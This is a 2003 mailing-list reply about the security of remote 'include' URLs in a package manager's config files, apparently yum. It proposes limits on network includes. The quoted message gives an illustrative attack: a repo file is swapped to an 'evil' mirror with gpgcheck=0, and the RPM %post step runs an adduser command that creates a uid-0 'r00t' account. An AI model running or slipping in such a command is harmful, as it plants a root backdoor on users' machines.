On Sat, 4 Oct 2003, seth vidal wrote: > > The first person who suggests gpg signing config files gets beaten. :) > > My general take is that this no big deal - but there is the possibility > for much abuse and much flexibility. Hard call between the two of them. > > from a standpoint of flexibility being able to get parts of your config > file from an arbitrary url is useful and handy - on the other hand that > think of this config file: > > [main] > include=http://domain.org/mymain.cgi > > include=http://freshrpms.net/default-repo > > include=http://fedora.us/default.repo > > include=http://joeblows/default.repo > > now fedora and freshrpms are trustworthy folks - but joeblow might not > be or none of their security might be good enough and the default.repo > for joeblows might normally be: > > [joeblows] > name = joe blow's rpms - the best rpms money can buy > baseurl=http://joeblows/rpms/ > gpgcheck=1 > > it could become: > [joeblows] > name = joe blow's rpms - the best rpms money can buy > baseurl=http://someotherplacew/evil/rpms/ > gpgcheck=0 > > > the results could be - that someotherplace has taken all of joeblows > rpms and rebuilt them with: > > %post > /usr/sbin/adduser -r -u 0 -p somepass r00t > After looking at this I have few suggestions. 1) Allow the user to disable the newtwork includes. 2) Have do not allow network includes to override already configured global items. 3) Perhaps have certain items that cannot be set (or unset) via a network include. I think would go a long way towards making it more secure in a network environment. Cheers...james P.S. The gpg signing did come to mind, but now I am in fear of saying it (-;
